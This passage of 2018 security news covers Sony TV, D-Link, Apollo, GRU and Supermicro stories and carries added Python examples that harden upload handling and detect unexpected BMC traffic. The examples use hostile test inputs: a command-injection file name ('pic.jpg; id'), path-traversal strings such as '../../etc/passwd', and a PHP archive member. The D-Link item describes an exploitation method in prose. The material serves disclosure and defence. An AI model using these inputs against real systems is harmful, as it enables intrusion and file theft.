The third flaw, a directory-traversal vulnerability tracked as CVE-2018-16594, relates to the way the Photo Sharing Plus app handles file names.

“The application handles file names incorrectly when receiving a user’s input file via uploading a URL. An attacker can upload an arbitrary file with a crafted file name (e.g.: ../../) that can then traverse the whole filesystem.” reads the blog post.
“Fortinet previously released IPS signature Sony.SmartTV.Directory.Traversal for this specific vulnerability to proactively protect our customers.”

Sony has released over-the-air updates to address the flaws; where automatic updates are disabled, the user has to install them manually.

“If your television is set to automatically receive updates when connected to the internet, it should have already been updated. This is the default setting for the affected models.” reads the security advisory published by Sony.

“To verify that your television has been updated, please visit the Downloads section of your model’s product page. Click the Firmware update link for details about how to check the software version. If your television has not already been updated, please follow the instructions to download and install the update.”
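Both CVE-2018-16593 (command injection) and CVE-2018-16594 (directory traversal) come from the same root cause: a client-supplied file name used, unchecked, in a shell command and in a filesystem path. The Python below is an added example, not Sony's or Fortinet's code, that shows the bug class next to a hardened version. The upload directory, the character allow-list and the hostile file names are my assumptions; the vulnerable function only builds the command string, it does not run it.

```python
import posixpath
import re

MEDIA_ROOT = "/var/photos"  # assumed upload directory, not taken from the advisory
_SAFE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def build_store_command_vulnerable(tmp_path, name):
    """The bug class behind CVE-2018-16593/16594: the client-chosen filename is
    interpolated into a shell command string and into a path with no checks.
    Returned (not executed) so the effect of a hostile name can be seen."""
    return f"cp {tmp_path} {MEDIA_ROOT}/{name}"


def safe_media_path(name):
    """Return an absolute path under MEDIA_ROOT or raise ValueError.

    Allow-list the characters (no separators, no leading dot, so '..' and hidden
    files are out), then re-check with normpath/commonpath as a second line of
    defence should the allow-list ever be loosened."""
    if not _SAFE_NAME_RE.fullmatch(name):
        raise ValueError(f"rejected filename: {name!r}")
    full = posixpath.normpath(posixpath.join(MEDIA_ROOT, name))
    if posixpath.commonpath([MEDIA_ROOT, full]) != MEDIA_ROOT:
        raise ValueError(f"path escapes media root: {name!r}")
    return full


def build_store_command_safe(tmp_path, name):
    """argv form for subprocess.run(..., shell=False): no shell parses the name,
    and '--' keeps a name that starts with '-' from being read as a cp option."""
    return ["cp", "--", tmp_path, safe_media_path(name)]


if __name__ == "__main__":
    for name in ("holiday_01.jpg", "pic.jpg; id", "../../etc/passwd"):  # constructed inputs
        print(f"{name!r:22} shell string: {build_store_command_vulnerable('/tmp/up-1', name)}")
        try:
            print(f"{'':22} safe argv:    {build_store_command_safe('/tmp/up-1', name)}")
        except ValueError as exc:
            print(f"{'':22} rejected:     {exc}")
```

The two controls are independent on purpose: dropping the shell removes the command-injection primitive even if a bad name slips through, and the allow-list plus commonpath check removes the traversal primitive even if some other code path still shells out.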


Sales intel firm Apollo data breach exposed more than 200 million contact records
7.10.2018 securityaffairs
Incident

The sales intelligence firm Apollo is the latest victim of a massive data breach, which exposed more than 200 million contact records.
Apollo collects a lot of its information from public sources, including names, email addresses, and company contact information, it also gathers data by scraping Twitter and LinkedIn.

The company notified its customers of the security breach last week; the incident occurred on 23 July 2018.

“On discovery, we took immediate steps to remediate our systems and confirmed the issue could not lead to any future unauthorized access,” co-founder and CEO Tim Zheng wrote.

“We can appreciate that this situation may cause you concern and frustration.”

The company, formerly known as ZenProspect, allows salespeople to connect with potential buyers using its database of 200 million contacts at 10 million companies.

Affected customers received a data breach notification email, a copy of which was obtained by TechCrunch.

The data breach notification said the breach was discovered weeks after system upgrades in July.

“We have confirmed that the majority of exposed information came from our publicly gathered prospect database, which could include name, email address, company names, and other business contact information,” reads the data breach notification email sent to the customers.

“Some client-imported data was also accessed without authorization.”

Exposed data includes email addresses, employers, geographic locations, job titles, names, phone numbers, salutations, social media profiles.

The good news is that the exposed data does not include Social Security numbers, financial data, or email addresses paired with passwords.


Apollo chief executive Tim Zheng confirmed the investigation is still ongoing, but he did not say if the company has informed state authorities of the security breach.

Apollo co-founder and CTO Ray Li told WIRED that the company is investigating the breach and has reported it to law enforcement.

Experts warn that the company may face sanctions under the European GDPR.

Even though no sensitive data was exposed, this kind of incident exposes the affected users to fraud, spam, and other, potentially more harmful, actions.

Troy Hunt has already added the records to his data breach tracking service HaveIBeenPwned.

“It’s just a staggering amount of data. There were 125,929,660 unique email addresses in total. This will probably be the most email notifications HaveIBeenPwned has ever sent for one breach,” Hunt explained. “Clearly this is all about ‘data enrichment,’ creating comprehensive profiles of individuals that can then be used for commercial purposes. As such, the more data an organization like Apollo can collect, the more valuable their service becomes.”


Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison
7.10.2018 securityaffairs
Crime

Gary Davis, one of the admins and moderators of the notorious Silk Road black marketplace, pleaded guilty to drug trafficking charges.
Gary Davis is an Irish national (20) who was one of the admins and moderators of the notorious Silk Road black marketplace; on Friday he pleaded guilty to drug trafficking charges.

“Geoffrey S. Berman, the United States Attorney for the Southern District of New York, announced that GARY DAVIS, a/k/a “Libertas,” pled guilty today to conspiring to distribute massive quantities of narcotics, a charge arising out of his role as a member of the small administrative staff of “Silk Road.”” reads the DoJ press release.

“Manhattan U.S. Attorney Geoffrey S. Berman said: “Silk Road was a secret online marketplace for illegal drugs, hacking services, and a whole host of other criminal activity. As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace. Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution.””


The man, who is also known as Libertas, faces a maximum sentence of 20 years in prison. Davis also provided customer support to Silk Road users in 2013, a job for which he received a weekly salary.

“From May 2013 up to June 2013, DAVIS served as a forum moderator for Silk Road. From June 2013 up to October 2, 2013, DAVIS worked as a site administrator on Silk Road.” continues the press release.

“In his role as a site administrator, DAVIS’s responsibilities included (1) responding to customer support requests from Silk Road users who needed assistance with their buyer or seller accounts on the marketplace; (2) serving as an arbitrator by resolving disputes that arose between drug dealers and buyers on the site; and (3) enforcing the rules for doing business on Silk Road, which had been set by Ulbricht.”

Silk Road was seized by law enforcement in 2013 and its founder Ross William Ulbricht (aka Dread Pirate Roberts) was arrested; he was later sentenced to life in prison after being convicted on multiple counts related to the Silk Road activity.

According to the FBI, between February 2011 and July 2013 Silk Road handled $1.2 billion worth of transactions for 957,079 users; Ulbricht’s total earnings were nearly $80 million.

According to the DoJ press release, more than $200 million worth of illegal drugs and other contraband were sold through the black market.

The FBI also seized about $33.6 million worth of Bitcoin, which authorities later sold in a series of auctions.

In November 2013, after the seizure of the original Silk Road, a new version of the popular black market, so-called Silk Road 2.0, was launched, and Libertas was one of its administrators; it is not clear, however, whether the pseudonym was still used by Davis at the time.

Davis was identified and arrested in Ireland in January 2014. He opposed extradition to the U.S., citing his mental health and fears for his life, and argued that extradition and subsequent incarceration in the U.S. would violate his fundamental rights.

Davis was extradited to the United States in July 2014; he is expected to be sentenced on 17 January 2019 by Judge Furman.
“DAVIS, 30, of Wicklow, Ireland, pled guilty to one count of conspiracy to distribute narcotics, which carries a maximum sentence of 20 years in prison.” concludes the DoJ. “The maximum potential sentence in this case is prescribed by Congress and is provided here for informational purposes only, as any sentencing of the defendant will be determined by the judge. DAVIS is scheduled to be sentenced by Judge Furman on January 17, 2019 at 3:30 p.m.”


Windows 10 October 2018 Update could cause CCleaner to stop working
7.10.2018 securityaffairs
Security

Users are reporting problems with the CCleaner software, which appears to be partially broken after the installation of the Windows 10 October 2018 Update.
Many Windows users are reporting problems after installing the Windows 10 October 2018 Update; a few days ago a Reddit user discovered that the Task Manager tool was showing inaccurate CPU usage after the upgrade.

Other users discovered that some files on their machines were deleted after the Windows 10 October 2018 Update was installed.

Now users are reporting problems with the CCleaner software that appears to be partially broken after the installation of Windows 10 October 2018 Update (version 1809).


Some users claim that certain features have stopped working after upgrading their operating system; in particular, CCleaner reportedly fails to clean recent files and documents in File Explorer.

According to the member crizal of the official Piriform forum, CCleaner 5.47.6716 no longer cleans the following:

Recent files/documents in File Explorer
Reliability History
Windows Event Logs (CCleaner shows they’re cleaned but they’re still there)
Registry Cleaner keeps finding the same Application Paths Issue after every reboot (System32\DriverStore\FileRepository)
CCleaner must force close Edge browser prior to every cleaning, even if the browser has been closed (not that big a deal to me)

Piriform plans to fix the issue soon.

“Thank you for reporting. We are aiming to fix this for the next release. Keep your eyes on the Beta Releases forum as we may publish it there first to get the fix out more quickly,” said a forum moderator.


China Tech Stocks Lenovo, ZTE Tumble After Chip Hack Report
7.10.2018 securityweek
BigBrothers

HONG KONG (AP) — Chinese tech stocks Lenovo Group and ZTE Corp. tumbled in Hong Kong on Friday following a news report Chinese spies might have used chips supplied by another company to hack into U.S. computer systems.

Lenovo shares closed down 15.1 percent while ZTE lost 11 percent.

Bloomberg News cited unidentified U.S. officials as saying malicious chips were inserted into equipment supplied by Super Micro Computer Inc. to American companies and government agencies.

Lenovo, with headquarters in Beijing and Research Triangle Park, North Carolina, is the biggest global manufacturer of personal computers and has a growing smartphone brand.

"Super Micro is not a supplier to Lenovo in any capacity," said Lenovo in a statement. "Furthermore, as a global company we take extensive steps to protect the ongoing integrity of our supply chain."

A spokeswoman for ZTE, headquartered in Shenzhen in southern China, said she wasn't aware of the report.

The Chinese foreign ministry didn't respond to a request for comment.

Bloomberg said Chinese military operatives added components to Super Micro products made at factories in China. It said the components included code that caused the products to accept changes to their software and to connect to outside computers.

Super Micro, headquartered in San Jose, California, denied its products contained malicious chips.

"Supermicro has never found any malicious chips, nor been informed by any customer that such chips have been found," said a company statement.

Chinese tech companies face heightened scrutiny in the United States.

A 2012 report by a congressional panel said ZTE and Chinese rival Huawei Technology Ltd. were security risks and warned American telecoms companies not to buy their equipment.

ZTE faced possible bankruptcy this year after Washington imposed a seven-year ban on sales of U.S. technology to the company over its exports to Iran and North Korea. American authorities lifted the ban in July after ZTE paid a $1 billion fine, agreed to replace its executive team and hired U.S.-selected compliance officers.


West Accuses Russian Spy Agency of Scores of Attacks
7.10.2018 securityweek
BigBrothers

LONDON (AP) — The West unleashed an onslaught of new evidence and indictments Thursday accusing Russian military spies of hacking so widespread that it seemed to target anyone, anywhere who investigates Moscow's involvement in an array of criminal activities — including doping, poisoning and the downing of a plane.

Russia defiantly denied the charges, neither humbled nor embarrassed by the exceptional revelations on one of the most high-tension days in East-West relations in years. Moscow lashed back with allegations that the Pentagon runs a clandestine U.S. biological weapons program involving toxic mosquitoes, ticks and more.

The nucleus of Thursday's drama was Russia's military intelligence agency known as the GRU, increasingly the embodiment of Russian meddling abroad.

In the last 24 hours: U.S. authorities charged seven officers from the GRU with hacking international agencies; British and Australian authorities accused the GRU of a devastating 2017 cyberattack on Ukraine, the email leaks that rocked the U.S. 2016 election and other damaging hacks; And Dutch officials alleged that GRU agents tried and failed to hack into the world's chemical weapons watchdog, the Organization for the Prohibition of Chemical Weapons.

The ham-handed attempted break-in — involving hacking equipment in the trunk of a car and a trail of physical and virtual clues — was the most stunning operation revealed Thursday. It was so obvious, in fact, that it almost looked like the Russians didn't care about getting caught.

"Basically, the Russians got caught with their equipment, people who were doing it, and they have got to pay the piper. They are going to have to be held to account," U.S. Defense Secretary James Mattis said in Brussels, where he was meeting with NATO allies.

Mattis said the West has "a wide variety of responses" available.

Britain's ambassador to the Netherlands, Peter Wilson, said the GRU would no longer be allowed to act with impunity.

Calling Russia a "pariah state," British Defense Secretary Gavin Williamson said: "Where Russia acts in an indiscriminate and reckless way, where they have done in terms of these cyberattacks, we will be exposing them."

Deputy Foreign Minister Sergei Ryabkov of Russia said in a statement that the U.S. is taking a "dangerous path" by "deliberately inciting tensions in relations between the nuclear powers," adding that Washington's European allies should also think about it.

While the accusations expose how much damage Russia can do in foreign lands, through remote hacking and on-site infiltration — they also expose how little Western countries can do to stop it.

Russia is already under EU and U.S. sanctions, and dozens of GRU agents and alleged Russian trolls have already been indicted by the U.S. but will likely never be handed over to face American justice.

Still, to the Western public, Thursday may have been a pivotal day, with accusations so extensive, and the chorus of condemnation so loud, that it left little doubt of massive Russian wrongdoing. A wealth of surveillance footage released by Western intelligence agencies was quickly and overwhelmingly confirmed by independent reporting.

The litany of accusations of GRU malfeasance began overnight, when British and Australian authorities accused the Russian agency of being behind the catastrophic 2017 cyberattack in Ukraine. The malicious software outbreak knocked out ATMs, gas stations, pharmacies and hospitals and, according to a secret White House assessment recently cited by Wired, caused $10 billion in damage worldwide.

The British and Australians also linked the GRU to other hacks, including the Democratic Party email leaks and online cyber propaganda that sowed havoc before Americans voted in the 2016 presidential election.

Later Thursday, Dutch defense officials released photos and a timeline of GRU agents' botched attempt to break into the chemical weapons watchdog using Wi-Fi hacking equipment hidden in a car parked outside a nearby Marriott Hotel. The OPCW was investigating a nerve agent attack on a former GRU spy, Sergei Skripal, and his daughter in Salisbury, England, that Britain has blamed on the Russian government. Moscow vehemently denies involvement.

Photographs released by the Dutch Ministry of Defense showed a trunk loaded with a computer, battery, a bulky white transformer and a hidden antenna; officials said the equipment was operational when Dutch counterintelligence interrupted the operation.

What Dutch authorities found seemed to be the work of an amateur. A taxi receipt in the pocket of one of the agents showed he had hired a cab to take him from a street next to GRU headquarters to Moscow's Sheremetyevo Airport. A laptop found with the team appeared to tie them to other alleged GRU hacks.

The men were expelled instead of arrested, because they were traveling on diplomatic passports.

The Dutch also accused the GRU of trying to hack investigators examining the 2014 downing of a Malaysian Airlines jetliner over eastern Ukraine that killed all 298 people on board. A Dutch-led team says it has strong evidence the missile that brought the plane down came from a Russia-based military unit. Russia has denied the charge.

Later Thursday, the U.S. Justice Department charged seven GRU officers — including the four caught in The Hague — in an international hacking rampage that targeted more than 250 athletes, a Pennsylvania-based nuclear energy company, a Swiss chemical laboratory and the OPCW.

The indictment said the GRU targeted those who had publicly supported a ban on Russian athletes in international sports competitions and who had condemned what they called a state-sponsored doping program by Russia.

U.S. prosecutors said the Russians also targeted a Pennsylvania-based nuclear energy company and the OPCW.

The seven were identified as: Aleksei Morenets, 41; Evgenii Serebriakov, 37; Ivan Yermakov, 32; Artem Malyshev, 30; and Dmitriy Badin, 27; who were each assigned to Military Unit 26165, and Oleg Sotnikov, 46, and Alexey Minin, 46, who were also GRU officers.

The U.S. indictment says the hacking was often conducted remotely. If that wasn't successful, the hackers would conduct "on-site" or "close access" hacking operations, with trained GRU members traveling with sophisticated equipment to target their victims through Wi-Fi networks.

The World Anti-Doping Agency, the U.S. Anti-Doping Agency and the Canadian anti-doping agency were all identified by the U.S. indictment against the Russians.

WADA said the alleged hackers "sought to violate athletes' rights by exposing personal and private data — often then modifying them — and ultimately undermine the work of WADA and its partners in the protection of clean sport."

Travis Tygart, the CEO of the U.S. anti-doping agency and a prominent critic of Russian athletes' drug use, says "a system that was abusing its own athletes with an institutionalized doping program has now been indicted for perpetrating cyberattacks on innocent athletes from around the world."

Russia denied everything.

Konstantin Kosachev, the head of the foreign affairs committee in the upper house of Russian parliament, said the accusations were fake and intended to "delegitimize" a resurgent Russia. The West has picked up the GRU as "a modern analogue of the KGB which served as a bugaboo for people in the West during the Cold War," he said.

Russia countered with accusations of their own: The Defense Ministry unveiled complex allegations that the U.S. has a clandestine biological weapons lab in the country of Georgia as part of a network of labs on the edges of Russia and China that flout international rules.

Pentagon spokesman Eric Pahon called the accusations "an invention" and "obvious attempts to divert attention from Russia's bad behavior on many fronts."

The Associated Press, meanwhile, independently corroborated information that matches details for two of the alleged Russian agents named by the Dutch authorities.

An online car registration database in Russia showed that Aleksei Morenets, whose full name and date of birth are the same as one of the expelled Russians, sold his car in 2004, listing the Moscow address where the Defense Ministry's Military University is based.

Alexey Minin, another Russian whose full name and date of birth match the Dutch details, had several cars, including an Alfa Romeo, that were registered and sold at the address where the Defense Ministry's GRU school is located. In some of the filings, Minin listed the official military unit number of the GRU school as his home address.


New Splunk IoT Solution Helps Secure ICS
7.10.2018 securityweek
ICS

Splunk this week unveiled a new solution designed to help industrial organizations protect control systems, monitor and diagnose equipment, and predict downtimes.

Splunk for Industrial IoT, expected to become available on October 30, combines the capabilities of Splunk Enterprise, Splunk Industrial Asset Intelligence, and the Splunk Machine Learning Toolkit.

Splunk says the new solution can help organizations in the energy, utilities, transportation, oil and gas, and manufacturing sectors monitor, optimize and secure their industrial systems.

Using the capabilities of Splunk Enterprise, Splunk for Industrial IoT should help organizations secure their industrial control systems (ICS) from cyber threats through advanced analytics and actionable intelligence, while ensuring that services are not disrupted, the company says.

Splunk for Industrial IoT allows organizations to search, correlate and visualize different types of data in real time to obtain all the information needed to assess their security posture, conduct investigations, and respond to incidents.

Security is only one of the components of the industrial IoT product. Splunk says organizations can also use it to monitor and diagnose industrial assets such as turbines, pumps, and compressors. Customers can monitor the uptime and availability of supervisory control and data acquisition (SCADA) systems, distributed control systems (DCS) and process control software.

In addition, Splunk says the new product can be used to identify early warning signs of an ICS downtime using prediction, anomaly detection and clustering algorithms.

“Industrial organizations are challenged daily to reduce costs, increase performance and secure their constantly expanding footprint of ‘connected’ devices to remain competitive in their industry,” said Dr. Ulrich Bock, Director of Data Analytics at ESE, a German industrial engineering firm. “Our partnership with Splunk is critical to the success of these customers, blending our knowledge of operational technology environments with Splunk’s powerful ability to make machine data accessible and usable to all. Splunk for Industrial IoT now makes it easy to harness and transform the massively growing volume of machine data into insights and energy to power and accelerate their digital transformation initiatives.”


D-Link Patches Code Execution, XSS Flaws in Management Tool
7.10.2018 securityweek
Vulnerability

D-Link has released patches for several remote code execution and cross-site scripting (XSS) vulnerabilities found by researchers in the company's Central WiFiManager access point management tool.

Central WiFiManager allows organizations to create and manage multi-site and multi-tenancy wireless networks. The software can be deployed both locally and in the cloud.

Researchers at SecureAuth + CoreSecurity discovered that version 1.03 – and possibly others – of Central WiFiManager for Windows is affected by four potentially serious vulnerabilities that can be exploited for arbitrary code execution.

The most severe of the security holes, CVE-2018-17440, is related to the fact that the web app includes an FTP server running on port 9000 with the default credentials admin/admin. An attacker can use it to establish a connection to the server and upload a specially crafted PHP file. Requesting this file can lead to arbitrary code execution.

Another code execution vulnerability discovered by researchers is CVE-2018-17442, which also involves uploading arbitrary files. The tool allows users to upload RAR archives and experts noticed that they can abuse the functionality to upload archives that include a PHP file whose content will be executed in the context of the web application. However, SecureAuth + CoreSecurity noted in its advisory that authentication is required for exploitation.

"When the .rar is uploaded it is stored in the path '\web\captivalportal' in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one," the security firm said in its advisory.

Experts also discovered two stored XSS flaws in the "UpdateSite" (CVE-2018-17443) and "addUser" (CVE-2018-17441) functionality, specifically the sitename and username parameters, respectively.

The vulnerabilities were reported to D-Link in early June and they were patched recently with the release of version 1.03R0100-Beta1.

"This disclosure directly affects the software package and current installations should be updated with the new release available to download below. Failure to update may put this software package, the host computer it runs on, and D-Link devices that it manages at risk," D-Link said in its own advisory.
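The two upload bugs on this page share a root cause: the Sony TV flaw trusts a client-supplied file name containing `../../`, and the D-Link Central WiFiManager flaw unpacks an uploaded archive under the web root into a directory whose name is derived from `time()`, so a PHP member becomes reachable and executable. The following is an added example, not Sony's or D-Link's code, showing the three checks an upload handler needs: refuse names with directory separators, refuse traversal and server-executable members inside an archive, and store into a randomly named directory outside the document root. It uses zip from the Python standard library as a stand-in for RAR (an assumption made so the example runs offline); the checks are the same for any archive format, and the `/tmp` storage root is only a demo location.

```python
"""Constructed hardening example for the upload flaws discussed above (not vendor code)."""
import io
import secrets
import shutil
import tempfile
import zipfile
from pathlib import Path, PurePosixPath
from typing import Dict, List

# Server-side executable types that must never land under a document root.
FORBIDDEN_SUFFIXES = {".php", ".phtml", ".php5", ".phar", ".cgi", ".pl", ".sh", ".exe"}


class UploadRejected(ValueError):
    """Raised for any upload that fails validation."""


def safe_basename(client_name: str) -> str:
    """Accept only a single, non-executable path component; '../../x' is refused, not cleaned."""
    if "/" in client_name or "\\" in client_name or "\x00" in client_name:
        raise UploadRejected(f"directory separators not allowed: {client_name!r}")
    if client_name in ("", ".", ".."):
        raise UploadRejected(f"bad file name: {client_name!r}")
    if PurePosixPath(client_name).suffix.lower() in FORBIDDEN_SUFFIXES:
        raise UploadRejected(f"executable type not allowed: {client_name}")
    return client_name


def new_storage_dir(root: Path) -> Path:
    """Per-upload directory with a random name; a time()-derived name can be
    guessed by anyone who learns the server clock, 128 random bits cannot."""
    path = root / secrets.token_urlsafe(16)
    path.mkdir(parents=True, exist_ok=False)
    return path


def confined(base: Path, member: str) -> Path:
    """Resolve member under base and refuse anything that escapes it."""
    base = base.resolve()
    target = (base / member).resolve()
    if base != target and base not in target.parents:
        raise UploadRejected(f"path escapes storage directory: {member}")
    return target


def extract_archive(data: bytes, root: Path) -> List[Path]:
    """Unpack an uploaded archive, rejecting traversal and executable members."""
    dest = new_storage_dir(root)
    written: List[Path] = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                member = info.filename
                if member.startswith("/") or "\\" in member or ".." in PurePosixPath(member).parts:
                    raise UploadRejected(f"archive member escapes: {member}")
                if PurePosixPath(member).suffix.lower() in FORBIDDEN_SUFFIXES:
                    raise UploadRejected(f"executable content in archive: {member}")
                target = confined(dest, member)
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_bytes(zf.read(info))
                written.append(target)
    except (UploadRejected, zipfile.BadZipFile):
        shutil.rmtree(dest, ignore_errors=True)  # leave nothing behind on failure
        raise
    return written


def build_zip(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()  # constructed sample archive for the demo
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def run_demo() -> Dict[str, object]:
    """Run the checks against constructed uploads and return what happened."""
    root = Path(tempfile.mkdtemp(prefix="uploads-"))
    out: Dict[str, object] = {}
    try:
        ok = extract_archive(build_zip({"portal/index.html": b"<h1>hi</h1>",
                                        "portal/style.css": b"body{}"}), root)
        out["benign_files"] = len(ok)
        out["benign_confined"] = all(root.resolve() in p.parents for p in ok)
        for label, entries in {"php_member": {"portal/cmd.php": b"<?php ?>"},
                               "traversal_member": {"../escape.txt": b"x"}}.items():
            try:
                extract_archive(build_zip(entries), root)
                out[label] = "accepted"
            except UploadRejected:
                out[label] = "rejected"
        for label, name in {"traversal_name": "../../etc/passwd",
                            "plain_name": "report.pdf"}.items():
            try:
                out[label] = safe_basename(name)
            except UploadRejected:
                out[label] = "rejected"
        out["dirs_left"] = sum(1 for p in root.iterdir() if p.is_dir())  # rejected uploads are cleaned up
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return out
```

`run_demo()` accepts the benign two-file archive, rejects the archive carrying `cmd.php` and the one whose member starts with `../`, rejects the traversal file name while passing a plain one through, and leaves exactly one storage directory behind, since rejected uploads are removed. Note that the suffix deny-list is a second line of defence only; the primary control is keeping the storage root outside any directory the web server will execute scripts from.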


Industry Reactions to Chinese Spy Chips: Feedback Friday
7.10.2018 securityweek
BigBrothers

Bloomberg reported this week that the Chinese government planted tiny chips in Super Micro servers to spy on Amazon, Apple and many other important organizations in the United States.

The spy chips allegedly made it into devices made by California-based Super Micro after Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built.

Once the chips were planted, they would reportedly allow attackers to remotely access the compromised devices. According to Bloomberg, the operation was conducted by the Chinese military and it targeted over 30 organizations, including government agencies and tech giants. Amazon, Apple and Super Micro have all denied the allegations.


Industry professionals contacted by SecurityWeek have commented on various aspects of the story, including the technical details, political impact, and how organizations can defend themselves against such attacks.

And the feedback begins...

Ian Pratt, co-founder and president, Bromium:

“From the publicly available information it sounds like the implant was intended to compromise the Baseboard Management Controller (BMC) that is present on most server hardware to allow remote management over a network. The BMC has a lot of control over the system. It can provide remote keyboard/video/mouse access to the system over the network. It also typically has access to lots of information about the host, such as its name, domain, IP addresses etc., and can query other information from the host via SNMP. The BMC can also be used to upgrade or modify the firmware used by the main CPU and Management Engine (ME), providing a great scope for stealthy malfeasance.

Based on the photographs, the device appears to be an SPI bus interposer, which would be inserted into the SPI bus between the BMC and the flash memory chip it boots from. A serial interface like SPI is very convenient for this purpose as it requires few pins (6), and hence a small and unobtrusive chip can be used. The implant likely contains a small firmware image that is served up to the BMC when it boots, in preference to the real firmware. Once that special image is running on the BMC, it likely puts the implant into pass-through mode and then loads the real firmware, but the special implanted code will stay resident within the BMC, controlling its actions.

It is likely that the implant would have had very limited functionality built directly into it. It would rely on communicating over the internet to a command and control server where it would report information about the machine it was resident on (such as the domain and network), and then receive instructions. I would expect/guess that out of the box it could have enabled the remote video/keyboard to the attacker, and would have been able to download additional code modules that it could store in BMC flash and use for other kinds of exploitation.

This communication with the C&C server is vulnerable to observation, and is quite likely how the implant was discovered -- rather more probable than someone spotting the tiny extra chip.”
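Pratt's last point, that the implant's command-and-control traffic is what most likely gave it away, is the one a defender can act on today: a BMC has a small, fixed set of legitimate peers (a management jump host, NTP, syslog), so any other destination from the management subnet is worth an alert. The following is an added detection example, not code from the article or any vendor; the subnet, internal ranges, allowed peers and the flow record format are all assumptions, and the sample flow lines are constructed (203.0.113.0/24 is a documentation range standing in for an arbitrary Internet host).

```python
"""Constructed detection example (not from the article or any vendor):
flag traffic from the BMC management subnet to peers it has no business
contacting, the observation Pratt says most likely exposed the implant."""
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Assumed layout: the out-of-band management subnet, the organisation's
# internal ranges, and the only peers a BMC is expected to reach.
BMC_SUBNET = ipaddress.ip_network("10.99.0.0/24")
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ALLOWED_PEERS = {
    ipaddress.ip_address("10.99.0.1"): {"any"},      # management jump host
    ipaddress.ip_address("10.10.0.5"): {"123/udp"},  # NTP
    ipaddress.ip_address("10.10.0.6"): {"514/udp"},  # syslog collector
}


@dataclass
class Flow:
    ts: str
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    dport: int
    proto: str
    nbytes: int


@dataclass
class Alert:
    flow: Flow
    reason: str


def parse_flow(line: str) -> Flow:
    """Parse 'ts src dst dport proto bytes' (constructed exporter format)."""
    ts, src, dst, dport, proto, nbytes = line.split()
    return Flow(ts, ipaddress.ip_address(src), ipaddress.ip_address(dst),
                int(dport), proto.lower(), int(nbytes))


def classify(flow: Flow) -> Optional[str]:
    """Return why a BMC-originated flow is unexpected, or None if it is fine."""
    if flow.src not in BMC_SUBNET:
        return None  # only traffic originating from BMCs is judged here
    service = f"{flow.dport}/{flow.proto}"
    allowed = ALLOWED_PEERS.get(flow.dst)
    if allowed is not None:
        if "any" in allowed or service in allowed:
            return None
        return f"BMC {flow.src} used unexpected service {service} on allowed peer {flow.dst}"
    if any(flow.dst in net for net in INTERNAL_RANGES):
        return f"BMC {flow.src} contacted non-allowlisted internal host {flow.dst}:{service}"
    return f"BMC {flow.src} reached external host {flow.dst}:{service}"


def detect(lines: Iterable[str]) -> List[Alert]:
    """Run classify() over flow records, skipping blanks and comments."""
    alerts: List[Alert] = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        flow = parse_flow(line)
        reason = classify(flow)
        if reason:
            alerts.append(Alert(flow, reason))
    return alerts


def alerts_by_bmc(alerts: Iterable[Alert]) -> Dict[str, int]:
    """Count alerts per BMC address, the unit an analyst would triage."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[str(a.flow.src)] = counts.get(str(a.flow.src), 0) + 1
    return counts


# Constructed flow records (ts src dst dport proto bytes).
SAMPLE_FLOWS = """\
2018-10-05T02:00:01Z 10.99.0.17 10.10.0.5 123 udp 76
2018-10-05T02:00:05Z 10.99.0.17 10.99.0.1 443 tcp 18432
2018-10-05T02:01:10Z 10.99.0.17 203.0.113.45 443 tcp 5120
2018-10-05T02:02:00Z 10.99.0.23 10.10.0.6 514 udp 312
2018-10-05T02:02:30Z 10.99.0.23 10.20.5.9 445 tcp 2048
2018-10-05T02:03:00Z 10.20.5.9 203.0.113.45 443 tcp 9000
2018-10-05T02:04:00Z 10.99.0.23 10.10.0.5 22 tcp 600
""".splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_FLOWS):
        print(alert.flow.ts, alert.reason)
```

On the sample records `detect()` raises three alerts: the BMC at 10.99.0.17 talking to an external host on 443/tcp, 10.99.0.23 reaching an internal file-sharing port on a host that is not on its peer list, and 10.99.0.23 opening SSH to the NTP server; the flow from the ordinary host 10.20.5.9 is ignored because the rule only judges BMC-originated traffic. The design choice that matters is the allowlist: a BMC should have no reason to initiate connections beyond a handful of management services, so anything else is signal rather than noise, which is exactly what makes an implant's beacon observable on the management network.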

Jack Jones, Co-Founder and Chief Risk Scientist, RiskLens:

“We all know that the Chinese have been persistent in their campaigns to steal intellectual property and government intelligence through digital infiltration. We’ve also always known that hardware backdoors are a potential vector for this activity. In fact, many information security professionals have been warning of this for years. Why then, have companies and government agencies continued to purchase vast amounts and varieties of technologies from China?

If we put ourselves in the shoes of a business executive or agency head the answer is fairly obvious — cost savings. They have limited resources with which to achieve their objectives. Yes, their security team may have whispered (or shouted) in their ear of the dangers, but our profession has long suffered from a Chicken Little image. After a while, the myriad “high risks” all start to become an abstract blur in an executive’s mind — as opposed to the clarity of, for example, a 10% lower price with a Chinese product. What decision-makers haven’t had is a way to appropriately weigh these cost saving decisions against the risk implications.

Obviously, while the jury is still out (in some people’s minds) about the veracity and effect of this latest Chinese incursion, it should still serve as a wake-up call. We have to do a much better job of defining, evaluating and communicating loss event scenario probabilities and impacts so that decision-makers can make better-informed decisions. It shouldn’t take a digital "bullet to the knee" before exposures like this are taken seriously.”

Brian Vecci, Technical Evangelist, Varonis:

